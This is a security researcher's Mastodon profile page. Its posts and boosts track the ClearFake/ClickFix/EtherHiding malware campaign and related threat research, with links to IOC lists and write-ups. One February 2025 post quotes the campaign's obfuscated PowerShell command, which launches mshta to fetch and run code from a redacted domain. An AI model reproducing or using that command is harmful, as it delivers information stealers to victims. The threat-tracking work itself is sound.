ttakvam

@[email protected]
16 Followers
68 Following
23 Posts
Security Consultant. PurpleTeam. DFIR/IR
GitHubhttps://github.com/ttakvam
Show threadttakvamFeb 8, 2025
@threatcat_ch my extractor broke from the changes :/ which payload? The logic for building the JS is using a array to build the command to run. Trying to figure it out and update the extractor. No luck as of yet :(
Show threadttakvamFeb 7, 2025

@threatcat_ch Been checking in on this campaign from time to time. New changes:

powershell -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://[DOMAIN]i=${usr_id}' -replace ']')

Also, the info stealer has been changed. Not certain of which as of now. But seems very similar to ACR Stealer.

ttakvamJan 23, 2025
msz ๐ŸฆฃJan 23, 2025

Campaign employs the Etherhide technique, where payloads are delivered from smart Web3 contracts and Cloudflare-hosted sites spreading Vidar malware across infected ~5k wordpress websites. The campaign has been active for ~3 months as of 2024-11-24. #Binance #EtherHide #ClearFake #ClickFix #Malware #IOC #przepisyjoli ;)

https://security.szustak.pl/etherhide/etherhide.html?mst

EtherHiding and ClickFix: new mask of social engineering campaign

Show threadttakvamJan 17, 2025
@cyberamateur did a writeup on this https://www.atea.no/siste-nytt/it-sikkerhet/investigating-a-clearfake-clickfix-etherhide-campaign/ also tracking the domains in the contract here https://github.com/ttakvam/ThreatResearch/blob/main/ClearFake-Dec-2024/IOCs/extracted_urls.txt something is up though. There is a secondary contract that updates when victim runs the mshta command. This have not been updating the last two days. Tested and is not able to pass the captcha on infected sites ๐Ÿฅถ
Investigating a ClearFake/ClickFix + Etherhide campaign

We have identified and tracked a new campaign utilizing ClearFake and EtherHiding technique. This infects legitimate websites resulting in information stealer.

Investigating a ClearFake/ClickFix + Etherhide campaign
ttakvamJan 17, 2025
Sekoia.ioJan 16, 2025

๐Ÿ” TDR analysts discovered a new Adversary-in-the-Middle (#AiTM) #phishing kit, specifically targeting Microsoft 365 accounts and circumventing 2-step verification: Sneaky 2FA

https://blog.sekoia.io/sneaky-2fa-exposing-a-new-aitm-phishing-as-a-service/

#detection #sneaky2fa

Sneaky 2FA: exposing a new AiTM Phishing-as-a-Service

In this blog post, learn about Sneaky 2FA, a new Adversary-in-the-Middle (AiTM) phishing kit targeting Microsoft 365 accounts.

Sekoia.io Blog
Show threadttakvamJan 11, 2025
@threatcat_ch yeah! Tracking it here https://github.com/ttakvam/ThreatResearch/blob/main/ClearFake-Dec-2024/IOCs/extracted_urls.txt
ThreatResearch/ClearFake-Dec-2024/IOCs/extracted_urls.txt at main ยท ttakvam/ThreatResearch

Contribute to ttakvam/ThreatResearch development by creating an account on GitHub.

GitHub
Show threadttakvamJan 10, 2025
@threatcat_ch we shared our investigation on this today. This is using the BSC testnet for their contracts. https://www.atea.no/siste-nytt/it-sikkerhet/investigating-a-clearfake-clickfix-etherhide-campaign/ been tracking this for a little while. Loader seem to change from time to time. Still, leads to #Lumma
Investigating a ClearFake/ClickFix + Etherhide campaign

We have identified and tracked a new campaign utilizing ClearFake and EtherHiding technique. This infects legitimate websites resulting in information stealer.

Investigating a ClearFake/ClickFix + Etherhide campaign
ttakvamJan 30, 2023
GlaciusJan 27, 2023

Hey :)

Earlier, we teased you some infrastructure details related to the pro-Russian hacktivist NoName057(16).
Today we published the full report, with all backend IPs, DDoS infrastructure IP ranges, some Stark-Industries insights,etc.:

https://team-cymru.com/post/a-blog-with-noname

@teamcymru_S2

A Blog with NoName

Further Insight into the Hacktivist Operation Targeting NATO and Affiliated Nations Key Findings NoName057(16) is a pro-Russian hacktivist operator / group, which has claimed responsibility for repeated Distributed Denial of Service (DDoS) attacks against entities in perceived anti-Russian countries since March 2022. NoName057(16) back-end infrastructure is hosted in Russia and likely operated by individual(s) with experience in systems design / maintenance. DDoS attack targeting instructions in

Team Cymru
ttakvamNov 19, 2022
Fabian BaderNov 18, 2022

Hello mastodon #infosec friends, I built a new website to better search for #Sentinel #AnalyticsRules.

https://analyticsrules.exchange

It is a searchable and filterable list of all Analytics rules in the public repository built automatically twice a day.

Feedback welcome

Microsoft Sentinel Analytic Rules

Microsoft Sentinel Analytic Rules
ttakvamNov 8, 2022
Kuba GretzkyNov 8, 2022

Microsoft has just released a patch for ZIP MOTW vulnerability assigned as CVE-2022-41091.

I am happy to be able to finally drop my bug analysis write-up! ๐Ÿ”ฅ๐Ÿœโ€‹

Enjoy and happy patching!
https://breakdev.org/zip-motw-bug-analysis/

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Windows ZIP extraction bug (CVE-2022-41049) lets attackers craft ZIP files, which evade warnings on attempts to execute packaged files, even if ZIP file was downloaded from the Internet.

BREAKDEV